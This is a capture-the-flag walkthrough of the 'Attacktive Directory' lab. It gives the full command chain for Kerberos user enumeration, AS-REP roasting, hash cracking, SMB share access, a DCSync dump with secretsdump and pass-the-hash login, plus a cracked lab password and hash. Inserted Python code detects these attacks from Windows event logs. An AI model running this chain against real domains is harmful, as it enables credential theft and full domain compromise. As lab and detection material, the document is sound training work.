Attacktive Directory

Information Gathering

sudo nmapAutomator.sh 10.10.237.39 all

Service Enumeration

Kerberos (Port 88)

kerbrute userenum -d spookysec.local userlist.txt --dc 10.10.237.39

With some vim magic, we remove any duplicate usernames and only extract the username portion.

Impacket has a tool called "GetNPUsers.py" (located in impacket/examples/GetNPUsers.py) that lets us query AS-REP roastable accounts (accounts with Kerberos pre-authentication disabled) from the Key Distribution Center. The only thing needed to query accounts is a valid set of usernames, which we enumerated previously with Kerbrute.

GetNPUsers.py spookysec.local/ -dc-ip 10.10.237.39 -usersfile valid_users.txt
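From the domain controller's side, the two steps above (Kerbrute user enumeration, then an AS-REP request for an account without pre-authentication) both leave Event ID 4768 (Kerberos TGT requested) records in the Security log. The following added example, which is not part of the original write-up or of the Impacket/Kerbrute projects, runs two simple detections over a constructed sample of such records: a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN (Status 0x6) failures from one source IP, and a TGT issued with PreAuthType 0. The key=value line format, timestamps, IPs and usernames are all constructed for the example; only the 4768 field names and status/encryption codes are real.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4768 records flattened to key=value pairs.
# Not real DC output; field names follow the 4768 schema. Status 0x6 is
# KDC_ERR_C_PRINCIPAL_UNKNOWN, PreAuthType 2 is PA-ENC-TIMESTAMP (normal),
# TicketEncryptionType 0x17 is RC4-HMAC, 0x12 is AES256.
SAMPLE_4768 = """\
time=2023-01-01T10:00:00 TargetUserName=tmpuser1 IpAddress=10.10.14.5 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
time=2023-01-01T10:00:00 TargetUserName=tmpuser2 IpAddress=10.10.14.5 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
time=2023-01-01T10:00:01 TargetUserName=tmpuser3 IpAddress=10.10.14.5 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
time=2023-01-01T10:00:01 TargetUserName=tmpuser4 IpAddress=10.10.14.5 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
time=2023-01-01T10:00:02 TargetUserName=tmpuser5 IpAddress=10.10.14.5 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
time=2023-01-01T10:00:02 TargetUserName=tmpuser6 IpAddress=10.10.14.5 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
time=2023-01-01T10:00:09 TargetUserName=svc-admin IpAddress=10.10.14.5 Status=0x0 PreAuthType=0 TicketEncryptionType=0x17
time=2023-01-01T10:03:00 TargetUserName=administrator IpAddress=10.10.1.20 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12
time=2023-01-01T10:04:00 TargetUserName=adminstrator IpAddress=10.10.1.20 Status=0x6 PreAuthType=0 TicketEncryptionType=0xffffffff
"""


def parse_events(text):
    """Turn the key=value lines into dicts; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        fields["time"] = datetime.fromisoformat(fields["time"])
        events.append(fields)
    return events


def find_no_preauth_tgts(events):
    """A TGT issued (Status 0x0) without pre-authentication (PreAuthType 0).

    Normal clients pre-authenticate, so a success here means the account has
    DONT_REQ_PREAUTH set and its AS-REP can be cracked offline. RC4 (0x17)
    is the classic signal but any encryption type is worth reviewing.
    """
    return [
        (e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
        for e in events
        if e["Status"] == "0x0" and e["PreAuthType"] == "0"
    ]


def find_enumeration_bursts(events, threshold=5, window_seconds=60):
    """Per source IP, the largest number of Status 0x6 (unknown principal)
    requests inside any sliding window; a burst is username enumeration.
    Returns {ip: count} for IPs at or above the threshold."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"] == "0x6":
            by_ip[e["IpAddress"]].append(e["time"])
    window = timedelta(seconds=window_seconds)
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        best, j = 0, 0
        for i in range(len(times)):
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            best = max(best, j - i)
        if best >= threshold:
            bursts[ip] = best
    return bursts


EVENTS = parse_events(SAMPLE_4768)

if __name__ == "__main__":
    print("no-preauth TGTs:", find_no_preauth_tgts(EVENTS))
    print("enumeration bursts:", find_enumeration_bursts(EVENTS))
```

The single mistyped username from 10.10.1.20 stays below the threshold, which is the point of windowing by source: a helpdesk typo and a wordlist run both produce Status 0x6, but only one of them produces many in a few seconds. The lasting fix for the second detection is to clear the "Do not require Kerberos preauthentication" flag on any account that does not genuinely need it.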

Next, we use john to crack the AS-REP hash we obtained for the svc-admin account.

Now we have credentials for svc-admin. svc-admin:management2005

crackmapexec smb 10.10.237.39 -u 'svc-admin' -p 'management2005' --shares

Looks like we have read access to the backup share.

SMB (Port 139/445)

smbclient \\\\10.10.237.39\\backup -U svc-admin management2005

Exploit

secretsdump.py 'backup@10.10.237.39' -just-dc
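The -just-dc option makes secretsdump pull the domain's credential material through directory replication (DCSync) rather than from the DC's disk, so the account used needs the DS-Replication-Get-Changes rights on the domain naming context. When Directory Service Access auditing is on for that object, each such request is logged as Event ID 4662 with the replication control-access GUIDs in its Properties field. The added example below, which is not part of the original write-up or of Impacket, flags 4662 records where a non-DC account exercises those rights. The record format, account names and object name are constructed; the three GUIDs are the real replication control-access rights.

```python
# Real control-access right GUIDs that grant directory replication.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL, REPL_GET_CHANGES_FILTERED}

# Constructed sample of Event ID 4662 records as key=value lines (not real
# DC output). Properties holds the access-right GUIDs, here joined with ';'.
SAMPLE_4662 = """\
SubjectUserName=DC01$ SubjectDomainName=SPOOKYSEC ObjectName=DC=spookysec,DC=local Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=backup SubjectDomainName=SPOOKYSEC ObjectName=DC=spookysec,DC=local Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=svc-admin SubjectDomainName=SPOOKYSEC ObjectName=CN=svc-admin,CN=Users,DC=spookysec,DC=local Properties={00000000-0000-0000-0000-000000000000}
"""


def parse_4662(text):
    """Key=value lines to dicts; Properties becomes a set of bare GUIDs."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        raw = fields["Properties"].strip("{}")
        fields["Properties"] = set(raw.split("};{")) if raw else set()
        events.append(fields)
    return events


def flag_dcsync(events, allowed_accounts=()):
    """Return (account, object, rights) for every 4662 where a subject that is
    neither a machine account nor an explicitly allowed account used a
    replication right. Domain controllers replicate among themselves
    legitimately (machine accounts end in '$'); products that sync the
    directory, such as Azure AD Connect's service account, belong in
    allowed_accounts."""
    findings = []
    for e in events:
        subject = e["SubjectUserName"]
        if subject.endswith("$") or subject in allowed_accounts:
            continue
        rights = sorted(e["Properties"] & REPLICATION_RIGHTS)
        if rights:
            findings.append((subject, e["ObjectName"], rights))
    return findings


EVENTS_4662 = parse_4662(SAMPLE_4662)

if __name__ == "__main__":
    for account, obj, rights in flag_dcsync(EVENTS_4662):
        print(f"replication rights used by {account} on {obj}: {rights}")
```

Two caveats for anyone deploying this: 4662 is only written when the SACL on the domain object audits the replication rights, so the detection silently sees nothing until that auditing is configured, and the same rights are the thing to audit on the preventive side, since a plain user such as "backup" holding DS-Replication-Get-Changes-All is equivalent to holding every credential in the domain.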

evil-winrm -i 10.10.237.39 -u Administrator -H 0e363213e37b94221497260b0bcb4fc
